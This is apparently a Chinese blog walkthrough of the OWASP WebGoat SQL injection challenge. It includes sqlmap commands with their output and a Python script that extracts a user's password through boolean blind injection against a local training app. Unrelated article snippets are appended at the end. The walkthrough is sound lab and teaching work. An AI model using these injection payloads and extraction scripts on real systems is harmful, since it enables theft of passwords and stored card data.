经过测试,发现注册时的用户名处存在布尔盲注,将如下内容保存为request.txt,开始用sqlmap
:
PUT http://127.0.0.1:8080/WebGoat/SqlInjection/challenge HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://127.0.0.1:8080/WebGoat/start.mvc
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 84
Cookie: JSESSIONID=61E3648728C46675C274BC0980B448BE
Connection: keep-alive
Host: 127.0.0.1:8080
username_reg=hello&email_reg=1%40q.com&password_reg=world&confirm_password_reg=world
要注意的是Cookie有时限
执行如下命令:
# 探测数据库类型,结果为:HSQLDB,并且建议加--no-cast参数
sqlmap -r request.txt -p username_reg
# 查数据库,获取3个数据库名:
# [*] INFORMATION_SCHEMA
# [*] PUBLIC
# [*] SYSTEM_LOBS
sqlmap -r request.txt -p username_reg --dbs --no-cast
# 查PUBLIC数据库,选择爆破,线程选最大的10,得到6张表
# Database: PUBLIC
# [6 tables]
# +--------------+
# | auth |
# | employee |
# | roles |
# | servers |
# | transactions |
# | user_data |
# +--------------+
sqlmap -r request.txt -p username_reg -D PUBLIC --tables --no-cast
# 获取user_data表的字段
# Database: PUBLIC
# Table: USER_DATA
# [10 columns]
# +-------------+-------------+
# | Column | Type |
# +-------------+-------------+
# | cc_number | non-numeric |
# | cc_type | non-numeric |
# | cookie | non-numeric |
# | email | non-numeric |
# | first_name | non-numeric |
# | last_name | non-numeric |
# | login_count | numeric |
# | password | non-numeric |
# | today | numeric |
# | userid | numeric |
# +-------------+-------------+
sqlmap -r request.txt -p username_reg -D PUBLIC -T user_data --columns --no-cast
# 最后一步出错了,,,
通过看源码发现,自己连正确的表都没有注出来,sqlmap就不指望了,写脚本跑吧
# coding:utf8
"""
True: already exists please try to register with a different username.
False: created, please proceed to the login page.
我解这个问题其实是在蒙,用sqlmap爆破发现register的username_reg有bool盲注,然后用sqlmap一通,知道一个表中有password字段,然后sqlmap再往下就出错了,没办法,写脚本吧,已经知道了字段,就直接盲注字段,老是不对,看源码才知道用户名原来是tom,小写的t,这样就得到密码了
但其实看源码之后才发现,sqlmap搞出来的表和我要注入的表是不一样的,就这样吧,误打误撞出来了
源码位置: WebGoat/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/plugin/advanced/SqlInjectionChallenge.java
"""
import requests
def get_status(content):
if 'already exists please try to register with a different username.' in content:
return 1
elif 'created, please proceed to the login page.' in content:
return 0
else:
return -1
url = 'http://127.0.0.1:8080/WebGoat/SqlInjection/challenge'
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Referer': 'http://127.0.0.1:8080/WebGoat/start.mvc',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Content-Length': '85',
'Cookie': 'JSESSIONID=F15EA9332EAE5CFBD726887EA270BC9C',
'Connection': 'keep-alive',
'Host': '127.0.0.1:8080',
}
data = {
'username_reg': 'a',
'email_reg': '[email protected]',
'password_reg': 'a',
'confirm_password_reg': 'a',
}
s = requests.session()
tom_pass_len = 0
for i in range(2, 100):
data['username_reg'] = "tom' AND LENGTH(password)=%d AND '1'='1" % i
res = s.put(url, headers=headers, data=data)
if get_status(res.content) == -1:
print 'Error'
print res.content
exit(0)
elif get_status(res.content) == 0:
continue
elif get_status(res.content) == 1:
print 'password len: %d' % i
tom_pass_len = i
break
tom_password = ['*'] * tom_pass_len
common_chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
for i in range(1, tom_pass_len+1):
for c in common_chars:
data['username_reg'] = "tom' AND SUBSTRING(password, %d, 1)='%s" % (i, c)
res = s.put(url, headers=headers, data=data)
if get_status(res.content) == -1:
print 'Error'
print res.content
exit(0)
elif get_status(res.content) == 0:
continue
elif get_status(res.content) == 1:
print c
tom_password[i-1] = c
break
print 'tom_password: ', ''.join(tom_password)
参考: https://klarsen.net/infosec/owasp-webgoat-sql-advanced-lesson/
文章浏览阅读1.2w次,点赞7次,收藏76次。MQ全称是MessageQueue(消息队列),是保存消息在传输过程中的一种容器,既是存储消息的一种中间件。多是应用在分布式系统中进行通信的第三方中间件,如下图所示,发送方成为生产者,接收方称为消费者。............_mq
文章浏览阅读1.5k次,点赞47次,收藏18次。Bug分析是QA的一项主要技能,需要针对项目中遇到的经典问题进行分类分析, 直达问题本质。 并且能够给团队其他项目或者成员起到典型的借鉴作用。 当然也有一些非常经典的问题可以进行技术深挖, 以供参考。 个人认为比较典型的「Bug分析」是stackoverflow, 当然, 一个完善的bug分析库, 可以进行问题分类总结。 对于测试新人是有很大的帮助的。本质上, 在测试领域很多问题是可重现可整理可规避的。另外, bug分析本身是为了拓宽每个人的认知边界, 缩小团队间的乔哈里窗以达到最佳的合作状态。一个「好的B
文章浏览阅读800次。HQST导读:PULSE普思是网络通讯行业中龙头企业之一,其中网络变压器产品大都由国内代工厂代为生产,H5020NLHX5020NL千兆四口网络变压器是普思公司经典老牌产品,相对整个市场用量不是很大,集中生产约一月20万颗左右……PULSE普思是网络通讯行业中龙头企业之一,其中网络变压器产品大都由国内代工厂代为生产,H5020NLHX5020NL千兆四口网络变压器是普思公司经典老牌产品,相对整个市场用量不是很大,集中生产约一月20万颗左右,……PULSE H5020NL千兆网络变压器对应HQS._4口网络变压器
文章浏览阅读242次,点赞3次,收藏9次。交换机,壳体采用镀锌钢板,结构紧凑,支持八个百兆端口,可配置一至四个百兆光纤端口。两路冗余电源设计,支持4pin可插拔端子,交直流通用,同时提供电源防接保护及过压、欠压保护,极大提升产品工作的稳定性。2.支持两路冗余电源设计,4pin可插拔端子,支持12~36V宽电压输入,交直流通用,同时提供电源防反接保护及过压、欠压保护,极大提升产品工作的稳定性。4.-40℃~75℃工作温度,-40~85℃存储温度,在极端气象条件下也能安全运行。8.支持IEEE802.3,IEEE802.3u,IEEE802.3x。
文章浏览阅读946次。Hi,我是阿昌,今天教你如何使用通义灵码。_通义灵码
文章浏览阅读2.3w次。我们在开发或编译旧版本NDK项目时,需要使用一些老版本的NDK,在这里提供了旧版NDK的列表及下载链接_ndk 老颁布
文章浏览阅读640次,点赞6次,收藏18次。网关是一个大的概念,没有特指是什么设备,很多设备都可以做网关,普通的PC机也能做,常用的网关设备是路由器。网关的作用主要是用来连接两个不同的网络,比如可以连接两个IP地址不相同的网络,或连接两个操作系统不同的网络,如WINDOWS与LINUX互连,或连接两个网络协议不同的网络,如TCP/IP与IPX.或拓扑结构不同的网络,如以太网和令牌环网。总之网关是一种中间媒介。而防火墙也可以做网关,但它的主要做用只是用来防病毒或防黑客,网关只算是防火墙的一个功能。网关与防火墙的区别。
文章浏览阅读4.1k次,点赞42次,收藏34次。背景在使用之前的代码时,报错: Traceback (most recent call last): File "xxx", line xx, in import pymysql ModuleNotFoundError: No module named 'pymysql'翻译:```追溯(最近一次通话):文件“xxx”,第xx行,在导入pymysqlModuleNotFoundError:没有名为“pymysql”的模块```原因 ......_modulenotfounderror: no module named 'pymysql
文章浏览阅读275次。1 import java.io.File;23 import java.io.IOException;45 import java.util.Locale;6789 import jxl.CellView;1011 import jxl.Workbook;1213 import jxl.WorkbookSettings;1415 import jxl.format.UnderlineStyle;..._android excel生成读取类
文章浏览阅读4.3w次,点赞16次,收藏126次。1、去微软官网下载完成ISO镜像,最好不要在线安装,打开官方链接 https://www.visualstudio.com/zh-cn/downloads/download-visual-studio-vs.aspx按下图操作:2、用虚拟光驱加载,或者直接右键解压。在安装前,先安装两个证书。亲测,安装后,减少了很多“安装包损坏或丢失”的现象。两证书下载地址链接: https:/..._vs2015离线版csdn
文章浏览阅读2k次,点赞4次,收藏3次。目前 postcss-pxtorem 版本最高6.0.0,报这个错是因为插件版本太高,降成5.1.1可解决这个报错解决方法:分两步1.执行npm uninstall post-pxtorem2.执行npm i [email protected]_error: postcss plugin postcss-import requires postcss 8.
文章浏览阅读787次。Linux-ARM开发_linux arm开发